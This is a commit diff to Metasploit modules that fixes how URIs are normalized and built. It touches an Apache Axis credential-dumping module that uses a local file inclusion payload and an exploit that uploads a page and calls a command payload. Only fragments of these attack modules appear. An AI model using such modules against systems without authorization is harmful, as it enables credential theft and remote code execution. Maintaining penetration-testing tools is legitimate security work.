Various and sundry fixes for normalize_uri
Tod Beardsley
parent
6a9445966a
commit
36adf86184
|
|
@ -62,7 +62,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
get_credentials(new_uri)
|
get_credentials(new_uri)
|
||||||
|
|
||||||
else
|
else
|
||||||
print_status("#{uri} - Apache Axis - The remote page not accessible")
|
print_status("#{target_url} - Apache Axis - The remote page not accessible")
|
||||||
return
|
return
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
@ -82,7 +82,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
'uri' => "#{uri}" + lfi_payload,
|
'uri' => "#{uri}" + lfi_payload,
|
||||||
}, 25)
|
}, 25)
|
||||||
|
|
||||||
print_status("#{uri} - Apache Axis - Dumping administrative credentials")
|
print_status("#{target_url} - Apache Axis - Dumping administrative credentials")
|
||||||
|
|
||||||
if (res and res.code == 200)
|
if (res and res.code == 200)
|
||||||
if res.body.to_s.match(/axisconfig/)
|
if res.body.to_s.match(/axisconfig/)
|
||||||
|
|
|
||||||
|
|
@ -65,7 +65,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
def check
|
def check
|
||||||
|
|
||||||
uri = normalize_uri(datastore['URI'])
|
uri = normalize_uri(datastore['URI'])
|
||||||
uri << '/' if uri[-1,1] != '/'
|
if uri[-1,1] != '/'
|
||||||
|
uri = uri + "index.php"
|
||||||
|
else
|
||||||
|
uri = uri + "/index.php"
|
||||||
|
end
|
||||||
|
|
||||||
res = send_request_raw({
|
res = send_request_raw({
|
||||||
'uri' => uri
|
'uri' => uri
|
||||||
|
|
@ -88,7 +92,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
def retrieve_session(user, pass)
|
def retrieve_session(user, pass)
|
||||||
|
|
||||||
uri = normalize_uri(datastore['URI'])
|
uri = normalize_uri(datastore['URI'])
|
||||||
uri << '/' if uri[-1,1] != '/'
|
if uri[-1,1] == "/"
|
||||||
|
uri = uri + "login.php"
|
||||||
|
else
|
||||||
|
uri = uri + "/login.php"
|
||||||
|
end
|
||||||
|
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
'uri' => uri,
|
'uri' => uri,
|
||||||
|
|
@ -114,7 +122,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
def upload_page(session, newpage, contents)
|
def upload_page(session, newpage, contents)
|
||||||
|
|
||||||
uri = normalize_uri(datastore['URI'])
|
uri = normalize_uri(datastore['URI'])
|
||||||
uri << '/' if uri[-1,1] != '/'
|
if uri[-1,1] == "/"
|
||||||
|
uri = uri + "ftp_upload_file.php"
|
||||||
|
else
|
||||||
|
uri = uri + "/ftp_upload_file.php"
|
||||||
|
end
|
||||||
|
|
||||||
boundary = rand_text_alphanumeric(6)
|
boundary = rand_text_alphanumeric(6)
|
||||||
|
|
||||||
|
|
@ -176,7 +188,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
print_status("Calling payload: #{cmdpath}")
|
print_status("Calling payload: #{cmdpath}")
|
||||||
|
|
||||||
uri = normalize_uri(datastore['URI'])
|
uri = normalize_uri(datastore['URI'])
|
||||||
uri << '/' if uri[-1,1] != '/'
|
if uri[-1,1] == "/"
|
||||||
|
uri = uri + cmdpath
|
||||||
|
else
|
||||||
|
uri = uri + "/#{cmdpath}"
|
||||||
|
end
|
||||||
|
|
||||||
send_request_raw({
|
send_request_raw({
|
||||||
'uri' => uri
|
'uri' => uri
|
||||||
|
|
|
||||||
|
|
@ -66,8 +66,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def execute_command(cmd, opts = {})
|
def execute_command(cmd, opts = {})
|
||||||
uri =normalize_uri(datastore['URI'])
|
uri = normalize_uri(datastore['URI'])
|
||||||
uri = Rex::Text::uri_encode(uri)
|
uri = Rex::Text::uri_encode(uri)
|
||||||
var_a = rand_text_alpha_lower(4)
|
var_a = rand_text_alpha_lower(4)
|
||||||
var_b = rand_text_alpha_lower(2)
|
var_b = rand_text_alpha_lower(2)
|
||||||
var_c = rand_text_alpha_lower(4)
|
var_c = rand_text_alpha_lower(4)
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue